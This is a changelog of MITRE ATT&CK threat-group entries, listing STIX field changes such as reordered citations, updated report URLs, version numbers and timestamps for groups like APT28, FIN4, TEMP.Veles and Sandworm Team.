external_references[5]['description']: DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020. → Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[5]['url']: https://us-cert.cisa.gov/ncas/alerts/aa20-302a → https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
external_references[6]['source_name']: CrowdStrike Wizard Spider October 2020 → CrowdStrike Ryuk January 2019
external_references[6]['description']: Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. → Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[6]['url']: https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ → https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[7]['source_name']: FireEye KEGTAP SINGLEMALT October 2020 → CrowdStrike Grim Spider May 2019
external_references[7]['description']: Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020. → John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
external_references[7]['url']: https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html → https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
external_references[8]['source_name']: FireEye Ryuk and Trickbot January 2019 → FireEye KEGTAP SINGLEMALT October 2020
external_references[8]['description']: Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. → Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.
external_references[8]['url']: https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html → https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
external_references[9]['source_name']: CrowdStrike Grim Spider May 2019 → CrowdStrike Wizard Spider October 2020
external_references[9]['description']: John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. → Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[9]['url']: https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/ → https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version: 2.0 → 2.1

[G0128] ZIRCONIUM

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-04-20 21:00:44.930000+00:00 → 2023-03-22 22:10:43.732000+00:00
x_mitre_version: 1.0 → 1.1

Patches

[G0007] APT28

Current version: 4.0

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
external_references: https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_references: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
dictionary_item_removed
STIX Field: Old value → New Value
external_references: https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_references: https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
values_changed
STIX Field: Old value → New Value
modified: 2022-03-16 18:08:13.958000+00:00 → 2023-03-26 17:51:20.401000+00:00
external_references[1]['source_name']: APT28 → SNAKEMACKEREL
external_references[1]['description']: (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) → (Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[2]['source_name']: IRON TWILIGHT → Fancy Bear
external_references[2]['description']: (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) → (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[3]['source_name']: SNAKEMACKEREL → Tsar Team
external_references[3]['description']: (Citation: Accenture SNAKEMACKEREL Nov 2018) → (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[4]['source_name']: Swallowtail → APT28
external_references[4]['description']: (Citation: Symantec APT28 Oct 2018) → (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['source_name']: Group 74 → STRONTIUM
external_references[5]['description']: (Citation: Talos Seduploader Oct 2017) → (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[6]['source_name']: Sednit → IRON TWILIGHT
external_references[6]['description']: This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) → (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[7]['source_name']: Sofacy → Threat Group-4127
external_references[7]['description']: This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) → (Citation: SecureWorks TG-4127)
external_references[8]['source_name']: Pawn Storm → TG-4127
external_references[8]['description']: (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) → (Citation: SecureWorks TG-4127)
external_references[9]['source_name']: Fancy Bear → Pawn Storm
external_references[9]['description']: (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) → (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[10]['source_name']: STRONTIUM → Swallowtail
external_references[10]['description']: (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) → (Citation: Symantec APT28 Oct 2018)
external_references[11]['source_name']: Tsar Team → Group 74
external_references[11]['description']: (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) → (Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name']: Threat Group-4127 → Accenture SNAKEMACKEREL Nov 2018
external_references[12]['description']: (Citation: SecureWorks TG-4127) → Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[13]['source_name']: TG-4127 → Crowdstrike DNC June 2016
external_references[13]['description']: (Citation: SecureWorks TG-4127) → Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[14]['source_name']: NSA/FBI Drovorub August 2020 → US District Court Indictment GRU Oct 2018
external_references[14]['description']: NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. → Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[14]['url']: https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF → https://www.justice.gov/opa/page/file/1098481/download
external_references[15]['source_name']: Cybersecurity Advisory GRU Brute Force Campaign July 2021 → GRIZZLY STEPPE JAR
external_references[15]['description']: NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. → Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[15]['url']https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDFhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[16]['source_name']DOJ GRU Indictment Jul 2018ESET Zebrocy May 2019
external_references[16]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[16]['url']https://www.justice.gov/file/1080281/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[17]['source_name']Ars Technica GRU indictment Jul 2018ESET Sednit Part 3
external_references[17]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[17]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[18]['source_name']Crowdstrike DNC June 2016Sofacy DealersChoice
external_references[18]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[18]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[19]['source_name']FireEye APT28FireEye APT28 January 2017
external_references[19]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[19]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[20]['source_name']SecureWorks TG-4127FireEye APT28
external_references[20]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[20]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[21]['source_name']FireEye APT28 January 2017Ars Technica GRU indictment Jul 2018
external_references[21]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[21]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[22]['source_name']GRIZZLY STEPPE JARTrendMicro Pawn Storm Dec 2020
external_references[22]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[22]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[23]['source_name']Sofacy DealersChoiceSecurelist Sofacy Feb 2018
external_references[23]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[23]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[24]['source_name']Palo Alto Sofacy 06-2018Kaspersky Sofacy
external_references[24]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[24]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[25]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[25]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[25]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[26]['source_name']ESET Zebrocy May 2019Talos Seduploader Oct 2017
external_references[26]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[26]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[27]['source_name']US District Court Indictment GRU Oct 2018Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020
external_references[27]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
external_references[27]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
external_references[28]['source_name']Kaspersky SofacyMicrosoft STRONTIUM Aug 2019
external_references[28]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[28]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_references[29]['source_name']ESET Sednit Part 3DOJ GRU Indictment Jul 2018
external_references[29]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[29]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://www.justice.gov/file/1080281/download
external_references[30]['source_name']Talos Seduploader Oct 2017Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[30]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[30]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[31]['source_name']Securelist Sofacy Feb 2018NSA/FBI Drovorub August 2020
external_references[31]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[31]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[32]['source_name']Secureworks IRON TWILIGHT ProfileSecureWorks TG-4127
external_references[32]['description']Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[32]['url']https://www.secureworks.com/research/threat-profiles/iron-twilighthttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[34]['source_name']Accenture SNAKEMACKEREL Nov 2018Secureworks IRON TWILIGHT Profile
external_references[34]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[34]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://www.secureworks.com/research/threat-profiles/iron-twilight
external_references[35]['source_name']TrendMicro Pawn Storm Dec 2020Symantec APT28 Oct 2018
external_references[35]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[35]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[36]['source_name']Microsoft STRONTIUM Aug 2019Sednit
external_references[36]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[37]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Sofacy
external_references[37]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)

[G0064] APT33

Current version: 1.4

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-23 21:22:08.170000+00:00 | 2023-03-08 22:07:25.123000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0138] Andariel

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-24 16:27:11.471000+00:00 | 2022-11-30 22:51:40.270000+00:00
external_references[3]['url'] | http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf | http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0001] Axiom

Current version: 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 15:52:00.359000+00:00 | 2023-03-20 22:03:44.661000+00:00
external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
external_references[6]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0035] Dragonfly

Current version: 3.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 22:09:02.443000+00:00 | 2023-03-08 22:03:28.170000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0085] FIN4

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-08-11 20:45:59.687000+00:00 | 2023-02-01 21:27:44.778000+00:00
external_references[2]['source_name'] | FireEye Hacking FIN4 Dec 2014 | FireEye FIN4 Stealing Insider NOV 2014
external_references[2]['description'] | Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018. | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.
external_references[2]['url'] | https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html | https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
external_references[3]['source_name'] | FireEye FIN4 Stealing Insider NOV 2014 | FireEye Hacking FIN4 Video Dec 2014
external_references[3]['description'] | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018. | Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html | https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html
external_references[4]['source_name'] | FireEye Hacking FIN4 Video Dec 2014 | FireEye Hacking FIN4 Dec 2014
external_references[4]['description'] | Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019. | Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.
external_references[4]['url'] | https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html | https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

[G0094] Kimsuky

Current version: 3.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-24 16:28:34.698000+00:00 | 2022-11-30 22:53:00.875000+00:00
external_references[6]['url'] | https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf | https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_removed
STIX Field | Old value | New Value
external_references | https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/ |
values_changed
STIX Field | Old value | New Value
modified | 2022-05-24 16:22:20.856000+00:00 | 2022-11-30 22:46:40.135000+00:00
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html (trailing space) | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[4]['source_name'] | FireEye TEMP.Veles 2018 (trailing space) | FireEye TRITON 2019
external_references[4]['description'] | FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[5]['source_name'] | FireEye TRITON 2019 | FireEye TEMP.Veles JSON April 2019
external_references[5]['description'] | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[6]['source_name'] | FireEye TEMP.Veles JSON April 2019 | Pylos Xenotime 2019
external_references[6]['description'] | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. | Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.
external_references[6]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html | https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
external_references[7]['source_name'] | Pylos Xenotime 2019 | XENOTIME
external_references[7]['description'] | Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019. | The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'XENOTIME', 'description': 'The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )'} |

[G0044] Winnti Group

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 16:27:20.897000+00:00 | 2023-03-20 22:02:53.982000+00:00
external_references[6]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[G0045] menuPass

Current version: 2.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-20 20:07:40.169000+00:00 | 2023-03-23 15:06:31.019000+00:00
external_references[9]['url'] | https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf | http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

mobile-attack

Major Version Changes

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX Field | Old value | New Value
external_references | https://www.justice.gov/opa/page/file/1098481/download |
values_changed
STIX Field | Old value | New Value
modified | 2022-10-12 20:11:40.313000+00:00 | 2023-03-08 22:12:31.238000+00:00
external_references[5]['source_name'] | BlackEnergy (Group) | IRIDIUM
external_references[5]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: Microsoft Prestige ransomware October 2022)
